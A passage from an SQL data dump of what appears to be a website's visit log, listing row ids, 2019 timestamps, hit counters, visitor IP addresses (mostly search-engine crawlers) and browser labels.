1,1,0,0,'66.249.64.30','chrome'),(404310,1553434943,1,1,0,0,'54.36.148.71','other'),(404311,1553435051,1,1,0,0,'46.229.168.130','other'),(404312,1553435084,1,1,0,0,'157.55.39.4','other'),(404313,1553435160,1,1,0,0,'46.229.168.145','other'),(404314,1553435218,1,1,0,0,'54.36.149.19','other'),(404315,1553435267,1,1,0,0,'66.249.64.62','chrome'),(404316,1553435411,1,1,0,0,'54.36.150.16','other'),(404317,1553435679,1,1,0,0,'5.45.207.79','other'),(404318,1553436816,1,1,0,0,'54.36.148.179','other'),(404319,1553437036,1,1,0,0,'54.36.148.82','other'),(404320,1553437131,1,1,0,0,'157.55.39.237','other'),(404321,1553437670,1,1,0,0,'54.36.150.17','other'),(404322,1553437883,1,1,0,0,'54.36.149.12','other'),(404323,1553437950,1,1,0,0,'54.36.150.94','other'),(404324,1553438128,1,1,0,0,'87.250.224.81','other'),(404325,1553438369,2,2,0,0,'5.45.207.19','other'),(404326,1553438413,3,3,0,0,'5.45.207.79','other'),(404327,1553438433,2,2,0,0,'178.154.244.11','other'),(404328,1553438691,1,1,0,0,'54.36.150.135','other'),(404329,1553438761,1,1,0,0,'180.76.15.17','other'),(404330,1553439030,1,1,0,0,'54.36.148.188','other'),(404331,1553439275,1,1,0,0,'37.9.113.20','other'),(404332,1553439367,1,1,0,0,'5.45.207.79','other'),(404333,1553439416,1,1,0,0,'54.36.148.88','other'),(404334,1553439457,1,1,0,0,'95.163.255.49','other'),(404335,1553439521,1,1,0,0,'54.36.149.73','other'),(404336,1553439530,1,1,0,0,'95.163.255.45','other'),(404337,1553439713,1,1,0,0,'54.36.148.19','other'),(404338,1553439995,1,1,0,0,'54.36.149.6','other'),(404339,1553440219,2,2,0,0,'157.55.39.237','other'),(404340,1553440664,1,1,0,0,'92.112.125.252','chrome'),(404341,1553441227,1,1,0,0,'91.196.178.36','chrome'),(404342,1553441341,2,2,0,0,'8.29.198.25','other'),(404343,1553441494,1,1,0,0,'46.229.168.129','other'),(404344,1553441565,1,1,0,0,'46.229.168.138','other'),(404345,1553442048,1,1,0,0,'87.181.196.51','chrome'),(404346,1553442256,1,1,0,0,'180.76.15.10','other'),(404347,1553442287,1,1,0,0,'54.36.148.162','other'),(404348,1553442583,1,1,0,0,'46.229.168.139','other'),(404349,1553442641,1,1,0,0,'46.229.168.153','other'),(404350,1553442784,1,1,0,0,'54.36.149.33','other'),(404351,1553442956,1,1,0,0,'54.36.149.46','other'),(404352,1553443227,1,1,0,0,'66.249.64.31','chrome'),(404353,1553443244,1,1,0,0,'46.229.168.144','other'),(404354,1553444135,1,1,0,0,'54.36.148.227','other'),(404355,1553444298,2,2,0,0,'157.55.39.230','other'),(404356,1553445197,1,1,0,0,'46.229.168.139','other'),(404357,1553445296,1,1,0,0,'54.36.148.179','other'),(404358,1553445311,1,1,0,0,'66.249.64.58','chrome'),(404359,1553445403,1,1,0,0,'54.36.150.95','other'),(404360,1553446525,1,1,0,0,'54.36.150.186','other'),(404361,1553446618,1,1,0,0,'157.55.39.230','other'),(404362,1553446742,1,1,0,0,'157.55.39.225','other'),(404363,1553446933,1,1,0,0,'91.196.178.169','chrome'),(404364,1553447057,1,1,0,0,'54.36.150.179','other'),(404365,1553447335,2,2,0,0,'66.249.64.29','chrome'),(404366,1553447472,1,1,0,0,'54.36.149.20','other'),(404367,1553447575,1,1,0,0,'46.211.134.22','chrome'),(404368,1553447612,1,1,0,0,'54.36.149.75','other'),(404369,1553447849,1,1,0,0,'66.249.64.62','chrome'),(404370,1553448084,1,1,0,0,'5.45.207.19','other'),(404371,1553448154,1,1,0,0,'54.36.150.120','other'),(404372,1553448538,1,1,0,0,'66.249.64.31','chrome'),(404373,1553448687,1,1,0,0,'54.36.148.208','other'),(404374,1553448969,1,1,0,0,'188.255.39.237','msie'),(404375,1553448980,1,1,0,0,'157.55.39.213','other'),(404376,1553449049,1,1,0,0,'54.36.149.28','other'),(404377,1553449235,1,1,0,0,'54.36.148.46','other'),(404378,1553449368,1,1,0,0,'157.55.39.225','other'),(404379,1553449409,1,1,0,0,'66.249.66.136','chrome'),(404380,1553449430,1,1,0,0,'54.36.148.237','other'),(404381,1553449518,1,1,0,0,'54.36.149.21','other'),(404382,1553449545,2,2,0,0,'66.249.66.134','chrome'),(404383,1553449635,1,1,0,0,'54.36.148.169','other'),(404384,1553449893,1,1,0,0,'13.66.139.0','other'),(404385,1553449996,1,1,0,0,'66.249.66.138','chrome'),(404386,1553450131,1,1,0,0,'95.163.255.46','other'),(404387,1553450455,1,1,0,0,'157.55.39.213','other'),(404388,1553450456,1,1,0,0,'54.36.148.191','other'),(404389,1553450615,1,1,0,0,'54.36.150.139','other'),(404390,1553450643,2,2,0,0,'66.249.66.134','chrome'),(404391,1553450692,1,1,0,0,'54.36.150.42','other'),(404392,1553450845,1,1,0,0,'66.249.66.60','chrome'),(404393,1553451122,1,1,0,0,'66.249.66.62','chrome'),(404394,1553451515,1,1,0,0,'54.36.150.185','other'),(404395,1553451541,1,1,0,0,'54.36.148.7','other'),(404396,1553451596,2,2,0,0,'66.249.66.136','chrome'),(404397,1553451693,1,1,0,0,'54.36.149.72','other'),(404398,1553452177,1,1,0,0,'8.29.198.26','other'),(404399,1553452239,1,1,0,0,'8.29.198.27','other'),(404400,1553452270,1,1,0,0,'46.229.168.142','other'),(404401,1553452555,1,1,0,0,'54.36.148.154','other'),(404402,1553452570,1,1,0,0,'54.36.148.9','other'),(404403,1553452670,1,1,0,0,'46.229.168.148','other'),(404404,1553452921,1,1,0,0,'66.249.66.138','chrome'),(404405,1553453033,1,1,0,0,'66.249.66.136','chrome'),(404406,1553453154,1,1,0,0,'54.36.148.249','other'),(404407,1553453495,1,1,0,0,'46.229.168.149','other'),(404408,1553453515,1,1,0,0,'54.36.149.75','other'),(404409,1553453640,1,1,0,0,'46.229.168.139','other'),(404410,1553453704,1,1,0,0,'207.46.13.126','other'),(404411,1553453826,1,1,0,0,'54.36.149.63','other'),(404412,1553454013,1,1,0,0,'54.36.148.51','other'),(404413,1553454183,1,1,0,0,'54.36.148.138','other'),(404414,1553454434,1,1,0,0,'46.229.168.133','other'),(404415,1553454967,1,1,0,0,'54.36.148.45','other'),(404416,1553455023,1,1,0,0,'54.36.149.12','other'),(404417,1553455427,1,1,0,0,'54.36.150.168','other'),(404418,1553455712,1,1,0,0,'54.36.148.197','other'),(404419,1553456036,1,1,0,0,'54.36.148.254','other'),(404420,1553456073,1,1,0,0,'66.249.66.136','chrome'),(404421,1553456127,1,1,0,0,'54.36.148.66','other'),(404422,1553456148,1,1,0,0,'66.249.66.138','chrome'),(404423,1553456449,1,1,0,0,'66.249.66.58','chrome'),(404424,1553456475,1,1,0,0,'46.229.168.145','other'),(404425,1553456515,1,1,0,0,'66.249.66.134','chrome'),(404426,1553456585,1,1,0,0,'216.244.66.241','other'),(404427,1553456845,1,1,0,0,'157.55.39.56','other'),(404428,1553457304,1,1,0,0,'23.111.19.182','chrome'),(404429,1553457544,1,1,0,0,'54.36.148.115','other'),(404430,1553457675,1,1,0,0,'54.36.150.51','other'),(404431,1553457847,1,1,0,0,'46.229.168.141','other'),(404432,1553458518,1,1,0,0,'157.55.39.213','other'),(404433,1553459203,2,2,0,0,'178.154.244.11','other'),(404434,1553459242,1,1,0,0,'54.36.148.130','other'),(404435,1553459244,1,1,0,0,'54.36.148.242','other'),(404436,1553459324,1,1,0,0,'54.36.148.114','other'),(404437,1553459388,2,2,0,0,'5.45.207.79','other'),(404438,1553459446,1,1,0,0,'46.229.168.141','other'),(404439,1553459586,1,1,0,0,'87.250.224.47','other'),(404440,1553459620,1,1,0,0,'37.9.113.148','other'),(404441,1553459663,1,1,0,0,'54.36.148.25','other'),(404442,1553459919,1,1,0,0,'54.36.149.42','other'),(404443,1553460199,1,1,0,0,'54.36.149.38','other'),(404444,1553460390,2,2,0,0,'95.108.213.4','other'),(404445,1553460540,2,2,0,0,'178.154.244.11','other'),(404446,1553460590,1,1,0,0,'54.36.150.137','other'),(404447,1553461004,1,1,0,0,'157.55.39.181','other'),(404448,1553461012,1,1,0,0,'87.250.224.47','other'),(404449,1553461087,1,1,0,0,'46.229.168.146','other'),(404450,1553461097,1,1,0,0,'54.36.148.139','other'),(404451,1553461143,1,1,0,0,'95.163.255.45','other'),(404452,1553461207,2,2,0,0,'5.45.207.19','other'),(404453,1553461971,1,1,0,0,'54.36.150.2','other'),(404454,1553462149,1,1,0,0,'5.196.87.173','other'),(404455,1553462306,1,1,0,0,'46.229.168.134','other'),(404456,1553463022,1,1,0,0,'54.36.149.74','other'),(404457,1553463023,2,2,0,0,'8.29.198.26','other'),(404458,1553463104,1,1,0,0,'54.36.148.129','other'),(404459,1553463496,1,1,0,0,'54.36.148.53','other'),(404460,1553463618,1,1,0,0,'157.55.39.213','other'),(404461,1553463718,1,1,0,0,'54.36.150.155','other'),(404462,1553463736,1,1,0,0,'66.249.66.134','chrome'),(404463,1553464062,1,1,0,0,'46.229.168.144','other'),(404464,1553464178,1,1,0,0,'54.36.150.178','other'),(404465,1553464184,1,1,0,0,'54.36.150.181','other'),(404466,1553464186,1,1,0,0,'46.229.168.134','other'),(404467,1553464250,2,2,0,0,'66.249.66.136','chrome'),(404468,1553464357,1,1,0,0,'46.229.168.148','other'),(404469,1553464429,1,1,0,0,'54.36.148.201','other'),(404470,1553464559,1,1,0,0,'54.36.149.70','other'),(404471,1553464605,2,2,0,0,'46.229.168.140','other'),(404472,1553464795,1,1,0,0,'54.36.148.113','other'),(404473,1553465569,1,1,0,0,'54.36.149.47','other'),(404474,1553465597,1,1,0,0,'54.36.148.224','other'),(404475,1553466152,1,0,1,0,'66.249.66.134',''),(404476,1553466197,1,1,0,0,'180.76.15.145','other'),(404477,1553466540,2,2,0,0,'66.249.66.136','chrome'),(404478,1553466599,1,1,0,0,'54.36.150.15','other'),(404479,1553466929,1,1,0,0,'54.36.148.37','other'),(404480,1553467159,2,2,0,0,'66.249.66.134','chrome'),(404481,1553467477,1,1,0,0,'54.36.150.0','other'),(404482,1553467595,1,1,0,0,'91.209.11.236','other'),(404483,1553467738,1,1,0,0,'46.229.168.134','other'),(404484,1553467741,1,1,0,0,'46.229.168.151','other'),(404485,1553468008,1,1,0,0,'157.55.39.213','other'),(404486,1553468053,1,1,0,0,'54.36.148.144','other'),(404487,1553468265,1,1,0,0,'54.36.150.27','other'),(404488,1553468567,1,1,0,0,'66.249.66.60','chrome'),(404489,1553468922,1,1,0,0,'54.36.149.31','other'),(404490,1553468963,1,1,0,0,'157.55.39.181','other'),(404491,1553469093,1,1,0,0,'54.36.148.82','other'),(404492,1553469096,1,1,0,0,'178.137.17.219','chrome'),(404493,1553469127,1,1,0,0,'157.55.39.213','other'),(404494,1553469138,1,1,0,0,'66.249.66.62','chrome'),(404495,1553470365,3,3,0,0,'66.249.66.138','chrome'),(404496,1553470434,1,1,0,0,'54.36.150.61','other'),(404497,1553470492,1,1,0,0,'66.249.66.134','chrome'),(404498,1553470551,1,1,0,0,'54.36.150.160','other'),(404499,1553470691,1,1,0,0,'46.229.168.154','other'),(404500,1553470726,1,1,0,0,'66.249.66.136','chrome'),(404501,1553470854,1,1,0,0,'5.45.207.79','other'),(404502,1553470881,3,3,0,0,'95.108.213.4','other'),(404503,1553470954,2,2,0,0,'87.250.224.47','other'),(404504,1553471176,1,1,0,0,'37.9.113.148','other'),(404505,1553471359,2,2,0,0,'60.191.38.77','firefox'),(404506,1553471560,2,2,0,0,'5.45.207.19','other'),(404507,1553471762,3,3,0,0,'178.154.244.11','other'),(404508,1553471813,1,1,0,0,'46.229.168.136','other'),(404509,1553471870,3,3,0,0,'87.250.224.47','other'),(404510,1553471873,3,3,0,0,'95.108.213.4','other'),(404511,1553471889,2,2,0,0,'5.45.207.79','other'),(404512,1553471989,1,1,0,0,'87.250.224.65','other'),(404513,1553472012,1,1,0,0,'157.55.39.213','other'),(404514,1553472031,2,2,0,0,'66.249.66.136','chrome'),(404515,1553472110,1,1,0,0,'37.9.113.148','other'),(404516,1553472388,1,1,0,0,'66.249.66.134','chrome'),(404517,1553472780,1,1,0,0,'178.154.244.11','other'),(404518,1553472955,1,1,0,0,'66.249.66.138','chrome'),(404519,1553472965,1,1,0,0,'5.45.207.79','other'),(404520,1553473077,1,1,0,0,'95.108.213.4','other'),(404521,1553473401,1,1,0,0,'54.36.148.35','other'),(404522,1553473865,1,1,0,0,'8.29.198.26','other'),(404523,1553473919,2,2,0,0,'66.249.66.58','chrome'),(404524,1553473921,1,1,0,0,'8.29.198.25','other'),(404525,1553474125,1,1,0,0,'207.46.13.222','other'),(404526,1553474254,4,4,0,0,'66.249.66.136','chrome'),(404527,1553474261,1,1,0,0,'157.55.39.202','other'),(404528,1553474443,1,1,0,0,'66.249.66.134','chrome'),(404529,1553475096,1,1,0,0,'5.45.207.79','other'),(404530,1553475562,1,1,0,0,'46.166.190.132','other'),(404531,1553475764,2,2,0,0,'40.77.167.132','other'),(404532,1553476060,1,1,0,0,'66.249.66.62','chrome'),(404533,1553476099,1,1,0,0,'66.249.66.136','chrome'),(404534,1553476352,1,1,0,0,'66.249.66.134','chrome'),(404535,1553476367,1,1,0,0,'216.244.66.241','other'),(404536,1553476450,1,1,0,0,'5.45.207.79','other'),(404537,1553476498,1,1,0,0,'66.249.66.58','chrome'),(404538,1553476847,1,1,0,0,'178.154.244.11','other'),(404539,1553477433,1,1,0,0,'66.249.66.60','chrome'),(404540,1553477482,2,2,0,0,'66.249.66.134','chrome'),(404541,1553477484,1,1,0,0,'54.36.149.29','other'),(404542,1553477654,1,1,0,0,'54.36.150.107','other'),(404543,1553477713,1,1,0,0,'46.229.168.130','other'),(404544,1553478059,1,1,0,0,'54.36.148.183','other'),(404545,1553478428,1,1,0,0,'54.36.150.174','other'),(404546,1553478592,2,2,0,0,'66.249.66.60','chrome'),(404547,1553478861,1,1,0,0,'54.36.148.43','other'),(404548,1553478930,1,1,0,0,'54.36.150.165','other'),(404549,1553479133,2,2,0,0,'66.249.66.138','chrome'),(404550,1553479184,2,2,0,0,'46.229.168.145','other'),(404551,1553479209,1,1,0,0,'54.36.148.35','other'),(404552,1553479248,1,1,0,0,'46.229.168.139','other'),(404553,1553479355,1,1,0,0,'54.36.150.161','other'),(404554,1553479744,1,1,0,0,'54.36.150.14','other'),(404555,1553480030,1,1,0,0,'54.36.148.189','other'),(404556,1553480389,1,1,0,0,'54.36.150.120','other'),(404557,1553480456,1,1,0,0,'54.36.149.55','other'),(404558,1553480497,1,1,0,0,'54.36.148.210','other'),(404559,1553480860,1,1,0,0,'66.249.66.134','chrome'),(404560,1553481072,1,1,0,0,'54.36.150.90','other'),(404561,1553481150,1,1,0,0,'66.249.66.138','chrome'),(404562,1553481309,1,1,0,0,'54.36.149.23','other'),(404563,1553481397,2,2,0,0,'66.249.66.136','chrome'),(404564,1553481573,1,1,0,0,'46.229.168.132','other'),(404565,1553481767,1,1,0,0,'54.36.148.199','other'),(404566,1553481773,1,1,0,0,'66.249.66.134','chrome'),(404567,1553481776,1,1,0,0,'54.36.148.90','other'),(404568,1553481996,1,1,0,0,'54.36.148.232','other'),(404569,1553482128,1,1,0,0,'66.249.66.62','chrome'),(404570,1553482323,1,1,0,0,'54.36.148.228','other'),(404571,1553482327,1,1,0,0,'151.248.63.154','msie'),(404572,1553482435,2,2,0,0,'157.55.39.254','other'),(404573,1553482800,1,1,0,0,'46.229.168.146','other'),(404574,1553482803,1,1,0,0,'54.36.148.170','other'),(404575,1553483594,1,1,0,0,'40.77.167.132','other'),(404576,1553483721,1,1,0,0,'66.249.66.62','chrome'),(404577,1553483725,2,2,0,0,'66.249.66.134','chrome'),(404578,1553483735,1,1,0,0,'54.36.148.209','other'),(404579,1553483838,1,1,0,0,'54.36.148.165','other'),(404580,1553484052,1,1,0,0,'54.36.148.100','other'),(404581,1553484235,1,1,0,0,'54.36.148.245','other'),(404582,1553484316,1,1,0,0,'109.74.154.72','chrome'),(404583,1553484602,1,1,0,0,'46.229.168.152','other'),(404584,1553484621,1,1,0,0,'54.36.148.29','other'),(404585,1553484704,2,2,0,0,'8.29.198.26','other'),(404586,1553484949,1,1,0,0,'216.244.66.241','other'),(404587,1553484973,1,1,0,0,'87.250.224.81','other'),(404588,1553485097,1,1,0,0,'5.45.207.79','other'),(404589,1553485174,1,1,0,0,'66.249.66.134','chrome'),(404590,1553485274,1,1,0,0,'178.154.244.11','other'),(404591,1553485286,1,1,0,0,'46.229.168.137','other'),(404592,1553485363,1,1,0,0,'40.77.167.108','other'),(404593,1553485367,1,1,0,0,'66.249.66.136','chrome'),(404594,1553485639,1,1,0,0,'54.36.149.1','other'),(404595,1553485672,1,1,0,0,'95.108.213.4','other'),(404596,1553485870,1,1,0,0,'5.45.207.19','other'),(404597,1553486271,1,1,0,0,'46.229.168.140','other'),(404598,1553486422,1,1,0,0,'54.36.149.70','other'),(404599,1553486460,2,2,0,0,'66.249.66.138','chrome'),(404600,1553486523,1,1,0,0,'46.229.168.133','other'),(404601,1553486682,3,3,0,0,'178.154.244.11','other'),(404602,1553486848,1,1,0,0,'66.249.66.62','chrome'),(404603,1553487046,1,1,0,0,'54.36.149.35','other'),(404604,1553487167,1,1,0,0,'5.45.207.79','other'),(404605,1553487171,1,1,0,0,'54.36.150.149','other'),(404606,1553487182,1,1,0,0,'5.196.87.174','other'),(404607,1553487214,4,4,0,0,'5.45.207.19','other'),(404608,1553487295,2,2,0,0,'66.249.66.136','chrome'),(404609,1553487297,1,1,0,0,'54.36.148.15','other'),(404610,1553487367,1,1,0,0,'54.36.149.41','other'),(404611,1553487413,1,1,0,0,'66.249.66.134','chrome'),(404612,1553487453,1,1,0,0,'54.36.150.67','other'),(404613,1553487637,1,1,0,0,'141.8.142.108','other'),(404614,1553487687,2,2,0,0,'207.46.13.56','other'),(404615,1553488137,1,1,0,0,'54.36.148.89','other'),(404616,1553488248,1,1,0,0,'46.229.168.138','other'),(404617,1553488294,1,1,0,0,'87.250.224.47','other'),(404618,1553488413,1,1,0,0,'54.36.148.86','other'),(404619,1553488481,2,2,0,0,'66.249.66.138','chrome'),(404620,1553488707,1,1,0,0,'54.36.148.219','other'),(404621,1553489436,1,1,0,0,'5.196.87.174','other'),(404622,1553489865,1,1,0,0,'46.229.168.142','other'),(404623,1553490006,1,1,0,0,'91.196.178.133','firefox'),(404624,1553490455,1,1,0,0,'66.249.66.134','chrome'),(404625,1553490524,1,1,0,0,'46.229.168.133','other'),(404626,1553491011,1,1,0,0,'54.36.148.105','other'),(404627,1553491038,1,1,0,0,'46.229.168.134','other'),(404628,1553491105,1,1,0,0,'54.36.148.199','other'),(404629,1553491189,1,1,0,0,'54.36.149.39','other'),(404630,1553491632,1,1,0,0,'54.36.150.184','other'),(404631,1553491680,1,1,0,0,'157.55.39.75','other'),(404632,1553491897,1,1,0,0,'54.36.150.178','other'),(404633,1553492001,2,2,0,0,'66.249.66.136','chrome'),(404634,1553492383,1,1,0,0,'54.36.148.206','other'),(404635,1553492459,1,1,0,0,'54.36.148.175','other'),(404636,1553492550,1,1,0,0,'54.36.148.49','other'),(404637,1553492770,1,1,0,0,'5.9.98.178','other'),(404638,1553492969,1,1,0,0,'46.229.168.153','other'),(404639,1553493022,1,1,0,0,'66.249.66.134','chrome'),(404640,1553493040,1,1,0,0,'66.249.66.136','chrome'),(404641,1553493171,1,1,0,0,'54.36.150.190','other'),(404642,1553493288,1,1,0,0,'54.36.150.124','other'),(404643,1553493543,1,1,0,0,'54.36.149.32','other'),(404644,1553493671,1,1,0,0,'5.9.98.178','other'),(404645,1553493897,2,2,0,0,'66.249.66.60','chrome'),(404646,1553493922,1,1,0,0,'54.36.148.48','other'),(404647,1553493923,1,1,0,0,'207.46.13.56','other'),(404648,1553493974,1,1,0,0,'54.36.150.104','other'),(404649,1553494028,1,1,0,0,'54.36.148.40','other'),(404650,1553494121,1,1,0,0,'54.36.148.80','other'),(404651,1553494138,2,2,0,0,'66.249.66.134','chrome'),(404652,1553494321,1,1,0,0,'54.36.150.141','other'),(404653,1553494572,1,1,0,0,'5.9.98.178','other'),(404654,1553494599,1,1,0,0,'66.249.66.138','chrome'),(404655,1553494921,2,2,0,0,'54.200.138.116','chrome'),(404656,1553494977,1,1,0,0,'46.229.168.141','other'),(404657,1553495267,1,1,0,0,'109.70.100.25','other'),(404658,1553495360,2,2,0,0,'91.196.178.93','chrome'),(404659,1553495424,1,1,0,0,'54.36.150.132','other'),(404660,1553495476,1,1,0,0,'5.9.98.178','other'),(404661,1553495508,1,1,0,0,'54.36.149.41','other'),(404662,1553495544,2,2,0,0,'8.29.198.27','other'),(404663,1553495576,1,1,0,0,'54.36.148.125','other'),(404664,1553495851,1,1,0,0,'54.36.149.72','other'),(404665,1553495991,1,1,0,0,'91.196.178.181','other'),(404666,1553496019,1,1,0,0,'54.36.150.174','other'),(404667,1553496117,1,1,0,0,'46.229.168.135','other'),(404668,1553496146,1,1,0,0,'66.249.66.134','chrome'),(404669,1553496314,1,1,0,0,'54.36.150.43','other'),(404670,1553496378,2,2,0,0,'66.249.66.138','chrome'),(404671,1553496426,1,1,0,0,'157.55.39.75','other'),(404672,1553496457,1,1,0,0,'91.196.178.65','chrome'),(404673,1553496534,1,1,0,0,'5.9.98.178','other'),(404674,1553496581,1,1,0,0,'66.249.66.136','chrome'),(404675,1553497297,1,1,0,0,'207.46.13.56','other'),(404676,1553497449,1,1,0,0,'5.9.98.178','other'),(404677,1553497559,1,1,0,0,'91.196.178.65','chrome'),(404678,1553497716,1,1,0,0,'66.249.66.134','chrome'),(404679,1553497749,2,2,0,0,'66.249.66.138','chrome'),(404680,1553497753,3,3,0,0,'66.249.66.136','chrome'),(404681,1553497999,1,1,0,0,'66.249.66.60','chrome'),(404682,1553498350,1,1,0,0,'5.9.98.178','other'),(404683,1553498411,1,1,0,0,'46.229.168.136','other'),(404684,1553498469,1,1,0,0,'54.36.148.150','other'),(404685,1553498628,1,1,0,0,'46.229.168.143','other'),(404686,1553498703,1,1,0,0,'5.196.87.173','other'),(404687,1553498764,1,1,0,0,'180.76.15.28','other'),(404688,1553498856,1,1,0,0,'54.36.150.23','other'),(404689,1553498928,1,1,0,0,'54.36.148.167','other'),(404690,1553499005,1,1,0,0,'66.249.66.136','chrome'),(404691,1553499257,1,1,0,0,'5.9.98.178','other'),(404692,1553499259,1,1,0,0,'66.249.66.60','chrome'),(404693,1553499596,1,1,0,0,'54.36.149.26','other'),(404694,1553499624,1,1,0,0,'46.229.168.154','other'),(404695,1553499650,1,1,0,0,'213.180.203.17','other'),(404696,1553499664,2,2,0,0,'141.8.142.38','other'),(404697,1553499686,1,1,0,0,'178.154.171.27','other'),(404698,1553499722,1,1,0,0,'46.229.168.132','other'),(404699,1553499728,1,1,0,0,'5.45.207.19','other'),(404700,1553499929,1,1,0,0,'95.108.181.75','other'),(404701,1553500160,1,1,0,0,'5.9.98.178','other'),(404702,1553500501,1,1,0,0,'141.8.183.23','other'),(404703,1553500530,1,1,0,0,'54.36.149.24','other'),(404704,1553500690,1,1,0,0,'54.36.148.186','other'),(404705,1553500745,1,1,0,0,'37.9.113.103','other'),(404706,1553500759,1,1,0,0,'54.36.148.199','other'),(404707,1553500761,1,1,0,0,'91.196.177.46','chrome'),(404708,1553500847,1,1,0,0,'54.36.148.49','other'),(404709,1553500917,1,1,0,0,'54.36.148.189','other'),(404710,1553501067,1,1,0,0,'5.9.98.178','other'),(404711,1553501244,1,1,0,0,'178.154.171.27','other'),(404712,1553501372,1,1,0,0,'66.249.66.138','chrome'),(404713,1553501678,1,1,0,0,'5.45.207.79','other'),(404714,1553501698,1,1,0,0,'87.250.224.81','other'),(404715,1553501815,1,1,0,0,'54.36.150.154','other'),(404716,1553501821,1,1,0,0,'91.196.177.46','chrome'),(404717,1553501872,1,1,0,0,'141.8.142.108','other'),(404718,1553502064,1,1,0,0,'54.36.150.120','other'),(404719,1553502367,1,1,0,0,'178.154.171.24','other'),(404720,1553502558,1,1,0,0,'91.196.178.93','chrome'),(404721,1553502725,3,3,0,0,'66.249.66.136','chrome'),(404722,1553502925,1,1,0,0,'5.255.253.25','other'),(404723,1553502989,1,1,0,0,'66.249.66.58','chrome'),(404724,1553503047,1,1,0,0,'46.229.168.147','other'),(404725,1553503300,1,1,0,0,'66.249.66.138','chrome'),(404726,1553503377,1,1,0,0,'178.154.171.17','other'),(404727,1553503691,1,1,0,0,'54.36.150.65','other'),(404728,1553503741,1,1,0,0,'46.229.168.150','other'),(404729,1553503773,1,1,0,0,'62.149.16.175','chrome'),(404730,1553504109,1,1,0,0,'54.36.149.42','other'),(404731,1553504227,1,1,0,0,'54.214.227.180','other'),(404732,1553504285,1,1,0,0,'54.36.148.151','other'),(404733,1553504370,1,1,0,0,'54.36.150.131','other'),(404734,1553504500,3,3,0,0,'66.249.66.136','chrome'),(404735,1553504603,1,1,0,0,'54.36.150.96','other'),(404736,1553504617,1,1,0,0,'54.36.150.143','other'),(404737,1553504758,1,1,0,0,'46.229.168.136','other'),(404738,1553504864,1,1,0,0,'54.36.148.49','other'),(404739,1553505000,1,1,0,0,'54.36.148.54','other'),(404740,1553505042,1,1,0,0,'216.244.66.241','other'),(404741,1553505499,1,1,0,0,'54.36.150.17','other'),(404742,1553505682,1,1,0,0,'5.196.87.171','other'),(404743,1553505729,1,1,0,0,'91.196.178.93','chrome'),(404744,1553505797,1,1,0,0,'40.77.167.36','other'),(404745,1553505973,1,1,0,0,'54.36.150.171','other'),(404746,1553505991,1,1,0,0,'54.36.150.75','other'),(404747,1553506303,1,1,0,0,'94.178.131.234','chrome'),(404748,1553506385,2,2,0,0,'8.29.198.27','other'),(404749,1553506462,1,1,0,0,'54.36.150.111','other'),(404750,1553506831,2,2,0,0,'66.249.66.62','chrome'),(404751,1553507022,1,1,0,0,'54.36.150.42','other'),(404752,1553507037,1,1,0,0,'46.229.168.154','other'),(404753,1553507132,1,1,0,0,'54.36.150.164','other'),(404754,1553507207,1,1,0,0,'91.196.177.15','chrome'),(404755,1553507333,1,1,0,0,'54.36.148.85','other'),(404756,1553507365,1,1,0,0,'157.55.39.254','other'),(404757,1553507522,1,1,0,0,'66.249.66.138','chrome'),(404758,1553507574,1,1,0,0,'54.36.149.103','other'),(404759,1553507684,1,1,0,0,'54.36.148.55','other'),(404760,1553507901,1,1,0,0,'54.36.150.144','other'),(404761,1553508244,1,1,0,0,'54.36.150.140','other'),(404762,1553508267,1,1,0,0,'157.55.39.9','other'),(404763,1553508331,1,1,0,0,'46.229.168.136','other'),(404764,1553508571,1,1,0,0,'54.36.148.137','other'),(404765,1553508668,1,1,0,0,'54.36.149.51','other'),(404766,1553508940,1,1,0,0,'54.36.148.111','other'),(404767,1553508989,1,1,0,0,'193.176.87.121','chrome'),(404768,1553508996,3,3,0,0,'66.249.66.60','chrome'),(404769,1553509711,1,1,0,0,'91.196.177.118','chrome'),(404770,1553509921,1,1,0,0,'66.249.66.138','chrome'),(404771,1553510254,1,1,0,0,'95.134.202.37','chrome'),(404772,1553510450,1,1,0,0,'157.55.39.9','other'),(404773,1553510484,1,1,0,0,'95.163.255.42','other'),(404774,1553510811,1,1,0,0,'54.36.150.17','other'),(404775,1553511245,1,1,0,0,'54.36.148.147','other'),(404776,1553511261,1,1,0,0,'54.36.148.117','other'),(404777,1553511336,1,1,0,0,'46.229.168.135','other'),(404778,1553511495,1,1,0,0,'54.36.150.172','other'),(404779,1553511635,1,1,0,0,'66.249.66.60','chrome'),(404780,1553511749,1,1,0,0,'40.77.167.36','other'),(404781,1553512025,1,1,0,0,'54.36.148.167','other'),(404782,1553512058,7,7,0,0,'144.76.91.79','other'),(404783,1553512517,1,1,0,0,'46.229.168.148','other'),(404784,1553512992,1,1,0,0,'54.36.148.241','other'),(404785,1553513298,1,1,0,0,'180.76.15.6','other'),(404786,1553513327,1,1,0,0,'54.36.148.156','other'),(404787,1553513437,1,1,0,0,'66.249.66.138','chrome'),(404788,1553514176,1,1,0,0,'54.36.150.142','other'),(404789,1553514360,3,3,0,0,'66.249.66.134','chrome'),(404790,1553514660,1,1,0,0,'54.36.149.60','other'),(404791,1553514918,1,1,0,0,'31.184.238.253','chrome'),(404792,1553515145,1,1,0,0,'141.8.132.16','other'),(404793,1553515186,1,1,0,0,'141.8.142.108','other'),(404794,1553515213,1,1,0,0,'95.108.181.54','other'),(404795,1553515249,1,1,0,0,'178.154.171.69','other'),(404796,1553515355,1,1,0,0,'46.229.168.149','other'),(404797,1553515356,1,1,0,0,'87.250.224.81','other'),(404798,1553515405,4,4,0,0,'95.108.213.4','other'),(404799,1553515408,2,2,0,0,'87.250.224.65','other'),(404800,1553515482,4,4,0,0,'5.45.207.19','other'),(404801,1553515484,1,1,0,0,'178.154.244.49','other'),(404802,1553515495,1,1,0,0,'54.36.150.112','other'),(404803,1553515508,2,2,0,0,'37.9.113.148','other'),(404804,1553515597,1,1,0,0,'207.46.13.222','other'),(404805,1553515613,1,1,0,0,'5.196.87.174','other'),(404806,1553515662,2,2,0,0,'87.250.224.47','other'),(404807,1553515697,3,3,0,0,'178.154.244.11','other'),(404808,1553515751,1,1,0,0,'178.154.171.27','other'),(404809,1553515890,1,1,0,0,'46.229.168.142','other'),(404810,1553515962,1,1,0,0,'54.36.148.128','other'),(404811,1553515965,1,1,0,0,'66.249.66.138','chrome'),(404812,1553516119,4,4,0,0,'5.45.207.79','other'),(404813,1553516259,2,2,0,0,'141.8.142.103','other'),(404814,1553516262,1,1,0,0,'40.77.167.36','other'),(404815,1553516327,1,1,0,0,'46.229.168.140','other'),(404816,1553516400,1,1,0,0,'5.45.207.19','other'),(404817,1553516507,1,1,0,0,'87.250.224.65','other'),(404818,1553516693,2,2,0,0,'178.154.171.1